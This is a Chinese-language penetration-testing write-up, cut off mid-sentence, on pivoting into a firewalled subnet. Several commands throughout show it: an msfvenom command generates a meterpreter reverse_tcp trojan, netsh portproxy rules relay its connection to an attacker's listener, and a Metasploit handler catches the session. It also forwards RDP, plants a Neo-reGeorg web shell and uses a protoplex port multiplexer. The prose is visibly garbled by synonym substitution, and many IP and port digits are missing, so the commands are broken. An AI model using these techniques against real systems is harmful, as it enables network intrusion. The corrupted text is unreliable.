前段时候在一次内网中碰到了一个题目,那时想了良多办法,固然最后没能管理然则也学了良多东西。
此刻想想也是很愁。
场景涌现大略处境即是此刻处于9的网段尔后有一个7网段机械的mssql账号(能够履行饬令和上传文献),而且7网段上的这台效劳器只对9这台机械盛开了4端口,需求到7的网段。
一张图简明懂得。
端口复用固然最后没能管理题目,然则也是学到了不少办法来应对彷佛的处境。
、netshnetsh(NetworkShell)是一个windows系统自身供给的机能强壮的网络建设饬令行器械,能够观察或更换内陆谋略机或长途谋略机的网络建设。
场景若是,即是说若是咱们这边铺开一下束缚规矩7的网段仍旧不出网,且只对9网段盛开4端口,然则7能够拜会9的网段。那如此咱们能够经历7机械反向连合9机械尔后在9机械做端口转发到进攻机械上的监听端口,这边在内陆复现改了一下ip以下图:
以及修正标的机械的防火潜规矩保证其余的端口没法被拜会。
运用msf生成反弹马,尔后将木立即传到标的机械。
msfvenom-ax64--platformwindows-pwindows/x64/meterpter/verse_tcpLHOST=0..55.0LPORT=-i-fexe-oo.exe
尔后咱们在0..5.0这台机械经历netsh建设端口转发将转发到进攻机的监听端口。
netshinterfaceportproxyaddv4tov4listenport=connectport=connectaddss=9.68.49.9在进攻机上建设监听,尔后在标的机械上履行木马。
useexploit/multi/handlersetpayloadwindows/x64/meterpter/verse_tcpsetlhost9.68.49.9setlport进攻机械胜利收到会话。
场景在场景中咱们的标的机械能够随便拜会咱们跳板机5.0的随便端口,若是咱们这儿发端增添束缚标的机械不能随便拜会跳板机械的端口,只可拜会指定端口譬喻:80、、4、5、06、89、、,这此中的一个也许多个端口,以下图。
和上头同样经历ms生成反向连合马以及上传到标的效劳器,建设连合端口为80.
msfvenom-ax64--platformwindows-pwindows/x64/meterpter/verse_tcpLHOST=0..55.0LPORT=80-i-fexe-oo.exe
这边为了谨严仍旧经历防火墙建设端口束缚,80能够拜会到,其余端口均不能拜会。
尔后经历netsh建设端口转发。
netshinterfaceportproxyaddv4tov4listenport=80connectport=connectaddss=9.68.49.9尔后在标的机械上履行木马,咱们经历端口连合能够看到标的机械与跳板机的80端口施行了连合且跳板机也收到连合,然则跳板机的80端口并没有转发到进攻机的监听端口,以下图。
咱们进攻机也同样没有收到回话。连续测试06端口(只对标的机械盛开06,其余端口均抑遏),环节同上咱们这儿直接跳太反复环节,直接到履行木马,尔后咱们能够发掘msf胜利的接遭到了会话,以下图。
端口平常转发。
经历测试发掘06和能够平常的施行转发80、、4、89、等弗成转发推测下是windows自带的一些效劳或许都不帮助这类处境。
场景咱们连续增添束缚前提在场景中咱们的标的机械能够拜会咱们跳板机5.0的局部端口,若是咱们这儿发端增添束缚标的机械不能拜会跳板机械的端口,然则咱们也不是只可拜会标的机械的4,咱们此次增添一个其余端口80也许06等,以下图。
咱们先商议80端口的处境,这个就较量简明直接看是甚么web效劳尔后上传对应的shell连合就能够了(Neo-Georg)。尔后是06,咱们仍旧能够经历netsh施行端口转发列出一个最简明的方法即是将标的机械上的06端口转发到89端口上。
netshinterfaceportproxyaddv4tov4listenport=06listenaddss=0..55.5connectport=89connectaddss=0..55.5
尔后咱们能够读明码也许加用户,再经历跳板机去连合长途桌面这边直联贯合06端口。
经历测试这类处境下有良多端口是弗成以如此转发的就譬喻iis盛开的80端口,曾经mssql的4端口,然则像06、这类端口是能够被转发的,以是现实不同处境需求多试验(这边熟练时差点把自身绕出来)。
、器械protoplex这是一个协定复用的器械,譬喻饬令可将内陆端口的流量依照协定典型转到内陆的和80端口,这边我做了一下熟练,发掘该器械的监听端口不能被占用也不能是06、4、89这类的非常端口。他能够监听0..55.5:,假使是socks5协定的流量就将流量转发给0..55.5:,假使是